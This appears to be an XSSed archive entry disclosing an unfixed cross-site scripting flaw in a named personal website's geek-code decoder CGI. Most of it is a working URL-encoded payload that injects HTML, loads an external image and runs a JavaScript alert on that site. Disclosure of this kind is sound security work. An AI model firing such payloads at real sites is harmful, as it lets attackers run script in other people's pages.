Unfixed XSS vulnerability at www.joereiss.net

2011-04-27T00:00:00
ID XSSED:72875
Type xssed
Reporter Kn0t
Modified 2011-11-12T00:00:00

Description

Security researcher Kn0t, has submitted on 27/04/2011 a cross-site-scripting (XSS) vulnerability affecting www.joereiss.net, which at the time of submission ranked 2923685 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.joereiss.net/geek/ungeek.cgi?%3C/code%3E%3Ccenter%3E%3Ch1%3EXSS%20by%20Kn0t%3C/h1%3E%3Cbr/%3E%3Cimg%20src='http://kn0t.doesntexist.org/wp-avt.png'%3E%3Cbr/%3E%3Ctable%20width='500'%3E%3Ctr%3E%3Ctd%3E%3Cdiv%20align='justify'%3EThere's%20an%20XSS%20vulnerability%20in%20your%20geek-decoding%20system.%20This%20vuln%20afflicts%20the%20page%20%3Ci%3E/geek/ungeek.cgi%3C/i%3E,%20because%20it%20prints%20variables%20without%20clear%20them%20from%20special%20symbols%20that%20can%20be%20JavaScript%20or%20HTML.%20This%20variables%20are%20passed%20by%20the%20page%20%3Ci%3E/geek/ungeek.html%3C/i%3E.%20The%20user%20can%20insert%20his%20Geek%20Code,%20then%20this%20cgi%20page%20works%20with%20it,%20returning%20the%20meaning.%20The%20code%20is%20passed%20from%20ungeek.html%20to%20ungeek.cgi,%20using%20a%20GET%20request%20(www.joereiss.net/geek/ungeek.cgi?THAT'S%20WHAT%20I'M%20SAYING)%20and%20printing%20without%20values.%20You%20can%20do%20two%20things%20to%20fix%20this%20vulnerability:%3Cbr/%3E1)%20Using%20the%20PHP%20function%20%3Ci%3Ehtmlspecialchars();%3C/i%3E%20to%20check%20the%20possibility%20of%20HTML%20code%20injection.%3Cbr/%3E2)%20You%20can%20replace%20the%20%22%3C%22%20char%20with%20a%20NULL,%20so%20you%20can%20decode%20your%20Geek%20Code%20without%20a%20risk%20of%20HTML%20injection%20or%20Javascript%20XSS's.%3Cbr/%3E%3Cbr/%3EKn0t%20%22Bubba%22%20Nuanda%20~%20%3Ca%20href='http://kn0t.doesntexist.org/'%3EDUNNO%3C/a%3E%3C/div%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ealert(%22XSS%20by%20Kn0t%22)%3C/script%3E%3C/center%3E%3C!--